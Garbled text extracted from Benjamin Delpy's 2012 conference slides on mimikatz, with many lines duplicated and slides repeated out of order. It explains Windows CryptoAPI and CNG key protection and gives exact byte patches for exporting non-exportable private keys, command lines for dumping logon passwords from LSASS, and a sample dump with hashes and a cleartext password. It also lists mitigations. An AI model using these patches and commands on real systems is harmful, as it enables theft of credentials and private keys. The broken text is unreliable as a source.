================ Certificat 0 ================ Numeacutero de seacuterie 112169417a1c3ef46a301f99385f50680fa0 Eacutemetteur CN=GlobalSign CodeSigning CA - G2 O=GlobalSign nv-sa C=BE Objet CN=Benjamin Delpy C=FR Il ne sagit pas dun certificat racine Hach cert (sha1) ab 9e 92 b9 43 ed 47 d9 15 bc 26 93 9e 24 a5 83 03 ac aa 7e Conteneur de cleacute = 470ADFBA-8718-4014-B05E-B30776B75A03 Fournisseur = Microsoft Enhanced Cryptographic Provider v10 La cleacute priveacutee NE PEUT PAS ecirctre exporteacutee Succegraves du test de cryptage CertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813) CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute
Exportable
mimikatz crypto patchcapi because I own my process
mimikatz crypto patchcapi because I own my process
So what A module in my own process return that I canrsquot do something CryptoAPI is in my memory space letrsquos patch it
I wrote ldquo4rdquo bytes in my memory space
So what A module in my own process return that I canrsquot do something CryptoAPI is in my memory space letrsquos patch it
I wrote ldquo4rdquo bytes in my memory space
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 43 43
text0AC0B7CB 0F 85 33 C7 FF FF jnz continue_key_export_or_archive
text0AC0B7CB 90 nop
text0AC0B7CC E9 33 C7 FF FF jmp continue_key_export_or_archive
text0AC1F749 0F 85 B6 3B FF FF jnz continue_key_export_or_archive_prepare
text0AC1F749 90 nop
text0AC1F74A E9 B6 3B FF FF jmp continue_key_export_or_archive_prepare
mimikatz crypto patchcapi demo time
mimikatz crypto patchcapi demo time
Import export import as not exportablehellip export
Import export import as not exportablehellip export
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 44 44
mimikatz crypto patchcapi limitations
mimikatz crypto patchcapi limitations
Because ndash Irsquom lazy
ndash Irsquove seen in majority of case RSA keys for real life use bull Elliptic Curve a littlehellip
mimikatz cryptopatchcapi only deal with ndash Microsoft Base Cryptographic Provider v10
ndash Microsoft Enhanced Cryptographic Provider v10
ndash Microsoft Enhanced RSA and AES Cryptographic Provider
ndash Microsoft RSA SChannel Cryptographic Provider
ndash Microsoft Strong Cryptographic Provider
hellipall based on rsaenhdll
Because ndash Irsquom lazy
ndash Irsquove seen in majority of case RSA keys for real life use bull Elliptic Curve a littlehellip
mimikatz cryptopatchcapi only deal with ndash Microsoft Base Cryptographic Provider v10
ndash Microsoft Enhanced Cryptographic Provider v10
ndash Microsoft Enhanced RSA and AES Cryptographic Provider
ndash Microsoft RSA SChannel Cryptographic Provider
ndash Microsoft Strong Cryptographic Provider
hellipall based on rsaenhdll
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 45 45
mimikatz crypto cng how it works
mimikatz crypto cng how it works
ldquoCryptography API Next Generation (CNG) is the long-term replacement for the CryptoAPI CNG is designed to be extensible at many levels and cryptography agnostic in behaviorrdquo ndash httpmsdnmicrosoftcomlibrarywindowsdesktopaa376210aspx
ldquoTo comply with common criteria (CC) requirements the long-lived keys must be isolated so that they are never present in the application process CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default
This time keys operations are not made in the ldquouserrdquo process context
Process use RPC to call ldquoKey isolation servicerdquo (keyiso) functions
It seems more secure than CryptoAPIhellip ndash It is but itrsquos not perfecthellip
ldquoCryptography API Next Generation (CNG) is the long-term replacement for the CryptoAPI CNG is designed to be extensible at many levels and cryptography agnostic in behaviorrdquo ndash httpmsdnmicrosoftcomlibrarywindowsdesktopaa376210aspx
ldquoTo comply with common criteria (CC) requirements the long-lived keys must be isolated so that they are never present in the application process CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default
This time keys operations are not made in the ldquouserrdquo process context
Process use RPC to call ldquoKey isolation servicerdquo (keyiso) functions
It seems more secure than CryptoAPIhellip ndash It is but itrsquos not perfecthellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 46 46
mimikatz crypto cng how itrsquos exported ( level)
mimikatz crypto cng how itrsquos exported ( level)
KeyIso Service (LSASS Process)
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 47 47
Process
CNG
Exportable
Load Private Key
Exported Key
yes
NTE_NOT_SUPPORTED
RPC
DPAPI Decode
PLAYSKOOL
Ask to export Key
NT6 System protected process ML_SYSTEM SYSTEM_MANDATORY_LABEL_NO_WRITE_UP SYSTEM_MANDATORY_LABEL_NO_READ_UP
no
mimikatz crypto patchcng because sometimes I own LSASS
mimikatz crypto patchcng because sometimes I own LSASS
When we want to export a certificate with its private key (or only the key) RPC calls lead to lsass(keyiso)ncryptSPCryptExportKey
This function do all the work to prepare the export and check if the key is exportable
When we want to export a certificate with its private key (or only the key) RPC calls lead to lsass(keyiso)ncryptSPCryptExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 48 48
mimikatz cryptoexportKeys [user] Cleacutes CNG - cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318 Exportabiliteacute NON Taille cleacute 2048 Export priveacute dans cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318pvk KO mod_cryptonggetPrivateKeyPrivateKeyBlobToPVK (0x80090029) Lopeacuteration demandeacutee nest pas prise en charge
Exportable
mimikatz crypto patchcng because sometimes I own LSASS
mimikatz crypto patchcng because sometimes I own LSASS
This time checks and keys are in LSASS processhellip And what
I wrote ldquo1rdquo byte in LSASS memory spacehellip
This time checks and keys are in LSASS processhellip And what
I wrote ldquo1rdquo byte in LSASS memory spacehellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 49 49
text6C815210 75 1C jnz short continue_key_export
text6C815210 EB 1C jmp short continue_key_export
mimikatz crypto patchcng demo time
mimikatz crypto patchcng demo time
Import export import as not exportablehellip export again
Import export import as not exportablehellip export again
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 50 50
mimikatz crypto patchcng limitations
mimikatz crypto patchcng limitations
Patch operation needs some privileges ndash Admin (debug privilege)
ndash SYSTEM
mimikatz cryptopatchcng only deal with ndash Microsoft Software Key Storage Provider (maybe others algs than RSA)
Not a limitation of mimikatz but MMC addin for certificates cannot export CNG certificateshellip even those that are exportable (hu ) ndash certutil canhellip
Patch operation needs some privileges ndash Admin (debug privilege)
ndash SYSTEM
mimikatz cryptopatchcng only deal with ndash Microsoft Software Key Storage Provider (maybe others algs than RSA)
Not a limitation of mimikatz but MMC addin for certificates cannot export CNG certificateshellip even those that are exportable (hu ) ndash certutil canhellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 51 51
mimikatz crypto patchcng bonus
mimikatz crypto patchcng bonus
After one admin patched LSASS all users of current system benefit of extra exports
ndash until reboot KeyIso service restart
Some others programs that doesnrsquot check the export flag before asking export can work too
ndash Yeah like the old good one certutil
After one admin patched LSASS all users of current system benefit of extra exports
ndash until reboot KeyIso service restart
Some others programs that doesnrsquot check the export flag before asking export can work too
ndash Yeah like the old good one certutil
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 52 52
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfx MY ================ Certificat 1 ================ [hellip] Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318 Fournisseur = Microsoft Software Key Storage Provider La cleacute priveacutee NE PEUT PAS ecirctre exporteacutee Succegraves du test de chiffrement CertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813) CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfx MY ================ Certificat 1 ================ [hellip] Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318 Fournisseur = Microsoft Software Key Storage Provider Succegraves du test de chiffrement CertUtil -exportPFX La commande sest termineacutee correctement
mimikatz crypto memo
mimikatz crypto memo
Some commands mimikatz cryptopatchcapi cryptoexportCertificates exit
psexec windows -s -c cmimikatzWin32mimikatzexe cryptopatchcapi cryptopatchcng
cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE cryptoexportKeys computer exit
mimikatz cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop
mimikatz privilegedebug cryptopatchcng cryptopatchcapi cryptoexportCertificates
cryptoexportKeys exit
Password ndash PFX files are protected by this password mimikatz
Keys ndash When you import multiple time a certificate exportable or not Windows make duplicate keys
ndash When you delete a certificate Windows does not delete its private keyhellip funny isnrsquot it bull So yes mimikatz can export it
Some commands mimikatz cryptopatchcapi cryptoexportCertificates exit
psexec windows -s -c cmimikatzWin32mimikatzexe cryptopatchcapi cryptopatchcng
cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE cryptoexportKeys computer exit
mimikatz cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop
mimikatz privilegedebug cryptopatchcng cryptopatchcapi cryptoexportCertificates
cryptoexportKeys exit
Password ndash PFX files are protected by this password mimikatz
Keys ndash When you import multiple time a certificate exportable or not Windows make duplicate keys
ndash When you delete a certificate Windows does not delete its private keyhellip funny isnrsquot it bull So yes mimikatz can export it
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 53 53
mimikatz crypto what we can do
mimikatz crypto what we can do
Exactly the same as for sekurlsa it will prevent access to accounts computer ndash no admin no admin no adminhellip
Basics ndash Use smartcardstoken for users certificates
ndash Use Hardware Security Modules (HSM) even SoftHSM
More in depth ndash See what Microsoft can do with TPM from Windows 8
bull Virtual SmartCard seems promising
ndash Verify vendors implementation (Lenovo Dell hellip) of TPM CSPKSP bull Their biometrics stuff was a little buggy )
Exactly the same as for sekurlsa it will prevent access to accounts computer ndash no admin no admin no adminhellip
Basics ndash Use smartcardstoken for users certificates
ndash Use Hardware Security Modules (HSM) even SoftHSM
More in depth ndash See what Microsoft can do with TPM from Windows 8
bull Virtual SmartCard seems promising
ndash Verify vendors implementation (Lenovo Dell hellip) of TPM CSPKSP bull Their biometrics stuff was a little buggy )
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 54 54
mimikatz what else can it do
mimikatz what else can it do
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker SRP bypass
Driver ndash Play with tokens amp privileges
ndash Display SSDT x86 amp x64
ndash List minifilters actions
ndash List Notifications (process thread image registry)
ndash List Objects hooks and procedures
ndash hellip
hellip
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker SRP bypass
Driver ndash Play with tokens amp privileges
ndash Display SSDT x86 amp x64
ndash List minifilters actions
ndash List Notifications (process thread image registry)
ndash List Objects hooks and procedures
ndash hellip
hellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 55 55
mimikatz thatrsquos all folks
mimikatz thatrsquos all folks
Thanksrsquo to Merci agrave
ndash my girlfriend for her support (her LSASS crashed few times)
ndash Application Security Forum to offer me this great opportunity bull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challenges bull nagual newsoft mubix hellip
ndash You for your attention
Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
Thanksrsquo to Merci agrave
ndash my girlfriend for her support (her LSASS crashed few times)
ndash Application Security Forum to offer me this great opportunity bull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challenges bull nagual newsoft mubix hellip
ndash You for your attention
Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 56 56
Blog Source Code amp Contact Blog Source Code amp Contact
blog httpbloggentilkiwicom mimikatz httpbloggentilkiwicommimikatz source httpscodegooglecompmimikatz email benjamingentilkiwicom
blog httpbloggentilkiwicom mimikatz httpbloggentilkiwicommimikatz source httpscodegooglecompmimikatz email benjamingentilkiwicom
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 57 57
mimikatz sekurlsa memo
mimikatz sekurlsa memo
Some commands mimikatz privilegedebug sekurlsalogonPasswords full exit
psexec windows -s -c cmimikatzWin32mimikatzexe sekurlsalogonPasswords full exit
meterpreter gt execute -H -c -i -m -f pentestpasswordsmimikatzmimikatz_x86exe
Some commands mimikatz privilegedebug sekurlsalogonPasswords full exit
psexec windows -s -c cmimikatzWin32mimikatzexe sekurlsalogonPasswords full exit
meterpreter gt execute -H -c -i -m -f pentestpasswordsmimikatzmimikatz_x86exe
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 36 36
mimikatz 10 x64 (RC) Traitement du Kiwi (Aug 2 2012 013228) httpbloggentilkiwicommimikatz mimikatz privilegedebug Demande dACTIVATION du privilegravege SeDebugPrivilege OK mimikatz sekurlsalogonPasswords full Authentification Id 0234870 Package dauthentification NTLM Utilisateur principal Gentil Kiwi Domaine dauthentification vm-w8-rp-x msv1_0 Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Hash LM d0e9aee149655a6075e4540af1f22d3b Hash NTLM cc36cf7a8514893efccd332446158b1a kerberos Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234 wdigest Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234 tspkg Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234 livessp nt (LUID KO)
mimikatz sekurlsa what we can do
mimikatz sekurlsa what we can do
Basics ndash No physical access to computer (first step to pass the hash then pass the pass) ndash No admin rights system rights debug privileges (hellip) ndash Disable local admin accounts ndash Strong passwords (haha it was a joke so useless ) ndash For privileged account network login instead of interactive (when possible) ndash Audit pass the hash keeps traces and can lock accounts ndash No admin rights system rights debug privileges even VIP ndash Use separated network (or forest) for privileged tasks
More in depth ndash Force strong authentication (SmartCard amp Token) $ euro ndash Short validity for Kerberos tickets ndash No delegation ndash Disable NTLM (available with NT6) ndash No exotic
bull biometrics (it keeps password somewhere and push it to Windows) bull single sign on
ndash Stop shared secrets for authentication push Public Private stuff (like keys )) ndash Let opportunities to stop retro compatibility ndash Disable faulty providers
bull Is it supported by Microsoft bull Even if you can disable LiveSSP TsPkg and WDigest will you disable Kerberos and msv1_0
Basics ndash No physical access to computer (first step to pass the hash then pass the pass) ndash No admin rights system rights debug privileges (hellip) ndash Disable local admin accounts ndash Strong passwords (haha it was a joke so useless ) ndash For privileged account network login instead of interactive (when possible) ndash Audit pass the hash keeps traces and can lock accounts ndash No admin rights system rights debug privileges even VIP ndash Use separated network (or forest) for privileged tasks
More in depth ndash Force strong authentication (SmartCard amp Token) $ euro ndash Short validity for Kerberos tickets ndash No delegation ndash Disable NTLM (available with NT6) ndash No exotic
bull biometrics (it keeps password somewhere and push it to Windows) bull single sign on
ndash Stop shared secrets for authentication push Public Private stuff (like keys )) ndash Let opportunities to stop retro compatibility ndash Disable faulty providers
bull Is it supported by Microsoft bull Even if you can disable LiveSSP TsPkg and WDigest will you disable Kerberos and msv1_0
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 37 37
mimikatz crypto what is it
mimikatz crypto what is it
A little module that I wrote to ndash play with Windows Cryptographic API CNG and RSA keys
ndash automate export of certificateskeys bull Even those which are ldquonotrdquo exportable
What crypto module can do ndash List
bull Providers
bull Stores
bull Certificates
bull Keys
ndash Export bull Certificates
ndash public in DER format
ndash with private keys in PFX format
bull Private keys in PVK format ndash itrsquos cool OpenSSL can deal with it too
ndash Patch bull CryptoAPI in mimikatz context
bull CNG in LSASS context (again )
A little module that I wrote to ndash play with Windows Cryptographic API CNG and RSA keys
ndash automate export of certificateskeys bull Even those which are ldquonotrdquo exportable
What crypto module can do ndash List
bull Providers
bull Stores
bull Certificates
bull Keys
ndash Export bull Certificates
ndash public in DER format
ndash with private keys in PFX format
bull Private keys in PVK format ndash itrsquos cool OpenSSL can deal with it too
ndash Patch bull CryptoAPI in mimikatz context
bull CNG in LSASS context (again )
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 38 38
mod_mimikatz_crypto
mimikatz crypto how itrsquos protected
mimikatz crypto how itrsquos protected
Private keys are DPAPI protected ndash You cannot reuse private key files on another computer
bull At least without the master keys andor password of users
ComputerUser can load their own keys because they have enough secrets to do it (ex session opened) ndash Yes a computerserver open a ldquosessionrdquo
ExportUsage can be limited by ndash Password
ndash Popup
ndash ExportArchive flag no present
Private keys are DPAPI protected ndash You cannot reuse private key files on another computer
bull At least without the master keys andor password of users
ComputerUser can load their own keys because they have enough secrets to do it (ex session opened) ndash Yes a computerserver open a ldquosessionrdquo
ExportUsage can be limited by ndash Password
ndash Popup
ndash ExportArchive flag no present
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 39 39
Constraint for most user Unavailable for computer keys
certutil -importpfx mycertp12 NoExport certutil -csp Microsoft Enhanced Cryptographic Provider v10 -importpfx mycertp12 NoExport
mimikatz crypto capi how it works
mimikatz crypto capi how it works
ldquoMicrosoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules CSPs perform all cryptographic operations and manage private keys CSPs can be implemented in software as well as in hardwarerdquo ndash httptechnetmicrosoftcomlibrarycc962093aspx
Processes (mimikatz IIS Active Directory Internet Explorer yourappsherehellip) load some DLL to deal with different cryptographic stuff CSP (keys) smartcard reader hellip ndash cryptdlldll rsaenhdll hellip
Process deal with cryptographic keys by this APIhellip
ldquoMicrosoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules CSPs perform all cryptographic operations and manage private keys CSPs can be implemented in software as well as in hardwarerdquo ndash httptechnetmicrosoftcomlibrarycc962093aspx
Processes (mimikatz IIS Active Directory Internet Explorer yourappsherehellip) load some DLL to deal with different cryptographic stuff CSP (keys) smartcard reader hellip ndash cryptdlldll rsaenhdll hellip
Process deal with cryptographic keys by this APIhellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 40 40
mimikatz crypto capi how itrsquos exported ( level)
mimikatz crypto capi how itrsquos exported ( level)
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 41 41
Process
CryptoAPI and RSA CSP
Exportable
Load Private Key
Exported Key
yes
NTE_BAD_KEY_STATE
no
DPAPI Decode
PLAYSKOOL
Ask to export Key
mimikatz crypto patchcapi because I own my process
mimikatz crypto patchcapi because I own my process
When we want to export a certificate with its private key (or only the key) it goes in rsaenhCPExportKey
This function do all the work to prepare the export and check if the key is exportable
When we want to export a certificate with its private key (or only the key) it goes in rsaenhCPExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 42 42
mimikatz cryptoexportCertificates Emplacement CERT_SYSTEM_STORE_CURRENT_USERMy - Benjamin Delpy Container Cleacute 470ADFBA-8718-4014-B05E-B30776B75A03 Provider Microsoft Enhanced Cryptographic Provider v10 Type AT_KEYEXCHANGE Exportabiliteacute NON Taille cleacute 2048 Export priveacute dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpypfx KO (0x8009000b) Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute Export public dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpyder OK
================ Certificat 0 ================ Numeacutero de seacuterie 112169417a1c3ef46a301f99385f50680fa0 Eacutemetteur CN=GlobalSign CodeSigning CA - G2 O=GlobalSign nv-sa C=BE Objet CN=Benjamin Delpy C=FR Il ne sagit pas dun certificat racine Hach cert (sha1) ab 9e 92 b9 43 ed 47 d9 15 bc 26 93 9e 24 a5 83 03 ac aa 7e Conteneur de cleacute = 470ADFBA-8718-4014-B05E-B30776B75A03 Fournisseur = Microsoft Enhanced Cryptographic Provider v10 La cleacute priveacutee NE PEUT PAS ecirctre exporteacutee Succegraves du test de cryptage CertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813) CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute
Exportable
mimikatz crypto patchcapi because I own my process
mimikatz crypto patchcapi because I own my process
So what A module in my own process return that I canrsquot do something CryptoAPI is in my memory space letrsquos patch it
I wrote ldquo4rdquo bytes in my memory space
So what A module in my own process return that I canrsquot do something CryptoAPI is in my memory space letrsquos patch it
I wrote ldquo4rdquo bytes in my memory space
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 43 43
text0AC0B7CB 0F 85 33 C7 FF FF jnz continue_key_export_or_archive
text0AC0B7CB 90 nop
text0AC0B7CC E9 33 C7 FF FF jmp continue_key_export_or_archive
text0AC1F749 0F 85 B6 3B FF FF jnz continue_key_export_or_archive_prepare
text0AC1F749 90 nop
text0AC1F74A E9 B6 3B FF FF jmp continue_key_export_or_archive_prepare
mimikatz crypto patchcapi demo time
mimikatz crypto patchcapi demo time
Import export import as not exportablehellip export
Import export import as not exportablehellip export
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 44 44
mimikatz crypto patchcapi limitations
mimikatz crypto patchcapi limitations
Because ndash Irsquom lazy
ndash Irsquove seen in majority of case RSA keys for real life use bull Elliptic Curve a littlehellip
mimikatz cryptopatchcapi only deal with ndash Microsoft Base Cryptographic Provider v10
ndash Microsoft Enhanced Cryptographic Provider v10
ndash Microsoft Enhanced RSA and AES Cryptographic Provider
ndash Microsoft RSA SChannel Cryptographic Provider
ndash Microsoft Strong Cryptographic Provider
hellipall based on rsaenhdll
Because ndash Irsquom lazy
ndash Irsquove seen in majority of case RSA keys for real life use bull Elliptic Curve a littlehellip
mimikatz cryptopatchcapi only deal with ndash Microsoft Base Cryptographic Provider v10
ndash Microsoft Enhanced Cryptographic Provider v10
ndash Microsoft Enhanced RSA and AES Cryptographic Provider
ndash Microsoft RSA SChannel Cryptographic Provider
ndash Microsoft Strong Cryptographic Provider
hellipall based on rsaenhdll
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 45 45
mimikatz crypto cng how it works
mimikatz crypto cng how it works
ldquoCryptography API Next Generation (CNG) is the long-term replacement for the CryptoAPI CNG is designed to be extensible at many levels and cryptography agnostic in behaviorrdquo ndash httpmsdnmicrosoftcomlibrarywindowsdesktopaa376210aspx
ldquoTo comply with common criteria (CC) requirements the long-lived keys must be isolated so that they are never present in the application process CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default
This time keys operations are not made in the ldquouserrdquo process context
Process use RPC to call ldquoKey isolation servicerdquo (keyiso) functions
It seems more secure than CryptoAPIhellip ndash It is but itrsquos not perfecthellip
ldquoCryptography API Next Generation (CNG) is the long-term replacement for the CryptoAPI CNG is designed to be extensible at many levels and cryptography agnostic in behaviorrdquo ndash httpmsdnmicrosoftcomlibrarywindowsdesktopaa376210aspx
ldquoTo comply with common criteria (CC) requirements the long-lived keys must be isolated so that they are never present in the application process CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default
This time keys operations are not made in the ldquouserrdquo process context
Process use RPC to call ldquoKey isolation servicerdquo (keyiso) functions
It seems more secure than CryptoAPIhellip ndash It is but itrsquos not perfecthellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 46 46
mimikatz crypto cng how itrsquos exported ( level)
mimikatz crypto cng how itrsquos exported ( level)
KeyIso Service (LSASS Process)
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 47 47
Process
CNG
Exportable
Load Private Key
Exported Key
yes
NTE_NOT_SUPPORTED
RPC
DPAPI Decode
PLAYSKOOL
Ask to export Key
NT6 System protected process ML_SYSTEM SYSTEM_MANDATORY_LABEL_NO_WRITE_UP SYSTEM_MANDATORY_LABEL_NO_READ_UP
no
mimikatz crypto patchcng because sometimes I own LSASS
mimikatz crypto patchcng because sometimes I own LSASS
When we want to export a certificate with its private key (or only the key) RPC calls lead to lsass(keyiso)ncryptSPCryptExportKey
This function do all the work to prepare the export and check if the key is exportable
When we want to export a certificate with its private key (or only the key) RPC calls lead to lsass(keyiso)ncryptSPCryptExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 48 48
mimikatz cryptoexportKeys [user] Cleacutes CNG - cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318 Exportabiliteacute NON Taille cleacute 2048 Export priveacute dans cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318pvk KO mod_cryptonggetPrivateKeyPrivateKeyBlobToPVK (0x80090029) Lopeacuteration demandeacutee nest pas prise en charge
Exportable
mimikatz crypto patchcng because sometimes I own LSASS
mimikatz crypto patchcng because sometimes I own LSASS
This time checks and keys are in LSASS processhellip And what
I wrote ldquo1rdquo byte in LSASS memory spacehellip
This time checks and keys are in LSASS processhellip And what
I wrote ldquo1rdquo byte in LSASS memory spacehellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 49 49
text6C815210 75 1C jnz short continue_key_export
text6C815210 EB 1C jmp short continue_key_export
